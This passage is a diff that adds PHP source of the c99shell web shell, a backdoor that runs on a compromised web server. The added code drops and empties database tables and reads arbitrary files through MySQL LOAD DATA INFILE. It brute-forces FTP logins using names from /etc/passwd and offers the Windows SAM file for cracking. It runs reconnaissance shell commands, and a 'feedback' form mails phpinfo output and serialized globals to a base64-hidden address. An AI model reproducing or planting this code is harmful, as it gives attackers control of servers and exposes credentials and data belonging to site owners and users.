+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"deleterow\">Delete</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+     } 
+    } 
+    else 
+    { 
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock); 
+     if (!$result) {echo mysql_smarterror();} 
+     else 
+     { 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; 
+      $i = 0; 
+      $tsize = $trows = 0; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       $tsize += $row["Data_length"]; 
+       $trows += $row["Rows"]; 
+       $size = view_size($row["Data_length"]); 
+       echo "<tr>"; 
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; 
+       echo "<td>".$row["Rows"]."</td>"; 
+       echo "<td>".$row["Type"]."</td>"; 
+       echo "<td>".$row["Create_time"]."</td>"; 
+       echo "<td>".$row["Update_time"]."</td>"; 
+       echo "<td>".$size."</td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; 
+       echo "</tr>"; 
+       $i++; 
+      } 
+      echo "<tr bgcolor=\"000000\">"; 
+      echo "<td><center><b>+</b></center></td>"; 
+      echo "<td><center><b>".$i." table(s)</b></center></td>"; 
+      echo "<td><b>".$trows."</b></td>"; 
+      echo "<td>".$row[1]."</td>"; 
+      echo "<td>".$row[10]."</td>"; 
+      echo "<td>".$row[11]."</td>"; 
+      echo "<td><b>".view_size($tsize)."</b></td>"; 
+      echo "<td></td>"; 
+      echo "</tr>"; 
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"tbldrop\">Drop</option>"; 
+      echo "<option value=\"tblempty\">Empty</option>"; 
+      echo "<option value=\"tbldump\">Dump</option>"; 
+      echo "<option value=\"tblcheck\">Check table</option>"; 
+      echo "<option value=\"tbloptimize\">Optimize table</option>"; 
+      echo "<option value=\"tblrepair\">Repair table</option>"; 
+      echo "<option value=\"tblanalyze\">Analyze table</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+      mysql_free_result($result); 
+     } 
+    } 
+   } 
+   } 
+  } 
+  else 
+  { 
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile"); 
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } 
+   if (!empty($sql_act)) 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if ($sql_act == "newdb") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} 
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+    } 
+    if ($sql_act == "serverstatus") 
+    { 
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "servervars") 
+    { 
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "processes") 
+    { 
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} 
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "getfile") 
+    { 
+     $tmpdb = $sql_login."_tmpdb"; 
+     $select = mysql_select_db($tmpdb); 
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} 
+     if ($select) 
+     { 
+      $created = FALSE; 
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); 
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); 
+      $result = mysql_query("SELECT * FROM tmp_file;"); 
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} 
+      else 
+      { 
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} 
+       $f = ""; 
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} 
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} 
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} 
+       mysql_free_result($result); 
+       mysql_query("DROP TABLE tmp_file;"); 
+      } 
+     } 
+     mysql_drop_db($tmpdb); //comment it if you want to leave database 
+    } 
+   } 
+  } 
+ } 
+ echo "</td></tr></table>"; 
+ if ($sql_sock) 
+ { 
+  $affected = @mysql_affected_rows($sql_sock); 
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} 
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; 
+ } 
+ echo "</table>"; 
+} 
+if ($act == "mkdir") 
+{ 
+ if ($mkdir != $d) 
+ { 
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} 
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} 
+  echo "<br><br>"; 
+ } 
+ $act = $dspact = "ls"; 
+} 
+if ($act == "ftpquickbrute") 
+{ 
+ echo "<b>Ftp Quick brute:</b><br>"; 
+ if (!win) {echo "This functions not work in Windows!<br><br>";} 
+ else 
+ { 
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) 
+  { 
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} 
+   else {$TRUE = TRUE;} 
+   if ($TRUE) 
+   { 
+    $sock = @ftp_connect($host,$port,$timeout); 
+    if (@ftp_login($sock,$login,$pass)) 
+    { 
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; 
+     ob_flush(); 
+     return TRUE; 
+    } 
+   } 
+  } 
+  if (!empty($submit)) 
+  { 
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} 
+   $fp = fopen("/etc/passwd","r"); 
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";} 
+   else 
+   { 
+    if ($fqb_logging) 
+    { 
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} 
+     else {$fqb_logfp = FALSE;} 
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; 
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    } 
+    ob_flush(); 
+    $i = $success = 0; 
+    $ftpquick_st = getmicrotime(); 
+    while(!feof($fp)) 
+    { 
+     $str = explode(":",fgets($fp,2048)); 
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) 
+     { 
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; 
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; 
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+      $success++; 
+      ob_flush(); 
+     } 
+     if ($i > $fqb_lenght) {break;} 
+     $i++; 
+    } 
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} 
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); 
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; 
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; 
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} 
+    fclose($fqb_logfp); 
+   } 
+  } 
+  else 
+  { 
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; 
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; 
+  } 
+ } 
+} 
+if ($act == "d") 
+{ 
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} 
+ else 
+ { 
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; 
+  if (!$win) 
+  { 
+   echo "<tr><td><b>Owner/Group</b></td><td> "; 
+   $ow = posix_getpwuid(fileowner($d)); 
+   $gr = posix_getgrgid(filegroup($d)); 
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); 
+  } 
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; 
+ } 
+} 
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} 
+if ($act == "security") 
+{ 
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; 
+ if (!$win) 
+ { 
+  if ($nixpasswd) 
+  { 
+   if ($nixpasswd == 1) {$nixpasswd = 0;} 
+   echo "<b>*nix /etc/passwd:</b><br>"; 
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} 
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; 
+   $i = $nixpwd_s; 
+   while ($i < $nixpwd_e) 
+   { 
+    $uid = posix_getpwuid($i); 
+    if ($uid) 
+    { 
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; 
+     echo join(":",$uid)."<br>"; 
+    } 
+    $i++; 
+   } 
+  } 
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} 
+ } 
+ else 
+ { 
+  $v = $_SERVER["WINDIR"]."\repair\sam"; 
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} 
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?.</font></b><br>";} 
+ } 
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} 
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} 
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version")); 
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); 
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); 
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); 
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); 
+ displaysecinfo("RAM",myshellexec("free -m")); 
+ displaysecinfo("HDD space",myshellexec("df -h")); 
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a")); 
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); 
+ displaysecinfo("Is cURL installed?",myshellexec("which curl")); 
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx")); 
+ displaysecinfo("Is links installed?",myshellexec("which links")); 
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch")); 
+ displaysecinfo("Is GET installed?",myshellexec("which GET")); 
+ displaysecinfo("Is perl installed?",myshellexec("which perl")); 
+ displaysecinfo("Where is apache",myshellexec("whereis apache")); 
+ displaysecinfo("Where is perl?",myshellexec("whereis perl")); 
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); 
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); 
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf")); 
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); 
+} 
+if ($act == "mkfile") 
+{ 
+ if ($mkfile != $d) 
+ { 
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} 
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} 
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} 
+ } 
+ else {$act = $dspact = "ls";} 
+} 
+if ($act == "encoder") 
+{ 
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; 
+ foreach(array("md5","crypt","sha1","crc32") as $v) 
+ { 
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; 
+ } 
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> 
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> 
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; 
+ echo "<center>base64_decode - "; 
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} 
+ else 
+ { 
+  $debase64 = base64_decode($encoder_input); 
+  $debase64 = str_replace("\0","[0]",$debase64); 
+  $a = explode("\r\n",$debase64); 
+  $rows = count($a); 
+  $debase64 = htmlspecialchars($debase64); 
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} 
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} 
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; 
+ } 
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; 
+ $c = strlen($encoder_input); 
+ for($i=0;$i<$c;$i++) 
+ { 
+  $hex = dechex(ord($encoder_input[$i])); 
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} 
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} 
+ } 
+ echo "\" readonly><br></center></form>"; 
+} 
+if ($act == "fsbuff") 
+{ 
+ $arr_copy = $sess_data["copy"]; 
+ $arr_cut = $sess_data["cut"]; 
+ $arr = array_merge($arr_copy,$arr_cut); 
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} 
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} 
+} 
+if ($act == "selfremove") 
+{ 
+ if (($submit == $rndcode) and ($submit != "")) 
+ { 
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } 
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} 
+ } 
+ else 
+ { 
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} 
+  $rnd = rand(0,9).rand(0,9).rand(0,9); 
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; 
+ } 
+} 
+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} 
+if ($act == "feedback") 
+{ 
+ $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); 
+ if (!empty($submit)) 
+ { 
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6); 
+  $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; 
+  if (!empty($fdbk_ref)) 
+  { 
+   $tmp = @ob_get_contents(); 
+   ob_clean(); 
+   phpinfo(); 
+   $phpinfo = base64_encode(ob_get_contents()); 
+   ob_clean(); 
+   echo $tmp; 
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; 
+  } 
+  mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); 
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; 
+ } 
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} 
+} 
+if ($act == "search") 
+{ 
+ echo "<b>Search in file-system:</b><br>"; 
+ if (empty($search_in)) {$search_in = $d;} 
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} 
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;} 
+ if (!empty($submit)) 
+ { 
+  $found = array(); 
+  $found_d = 0; 
+  $found_f = 0; 
+  $search_i_f = 0; 
+  $search_i_d = 0; 
+  $a = array 
+  ( 
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp, 
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp, 
+   "text_wwo"=>$search_text_wwo, 
+   "text_cs"=>$search_text_cs, 
+   "text_not"=>$search_text_not 
+  ); 
+  $searchtime = getmicrotime(); 
+  $in = array_unique(explode(";",$search_in)); 
+  foreach($in as $v) {c99fsearch($v);} 
+  $searchtime = round(getmicrotime()-$searchtime,4); 
+  if (count($found) == 0) {echo "<b>No files found!</b>";} 
+  else 
+  { 
+   $ls_arr = $found; 
+   $disp_fullpath = TRUE; 
+   $act = "ls"; 
+  } 
+ } 
+ echo "<form method=POST> 
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> 
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp 
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> 
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> 
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text 
+<br><br><input type=submit name=submit value=\"Search\"></form>"; 
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} 
+} 
+if ($act == "chmod") 
+{ 
+ $mode = fileperms($d.$f); 
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} 
+ else 
+ { 
+  $form = TRUE; 
+  if ($chmod_submit) 
+  { 
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); 
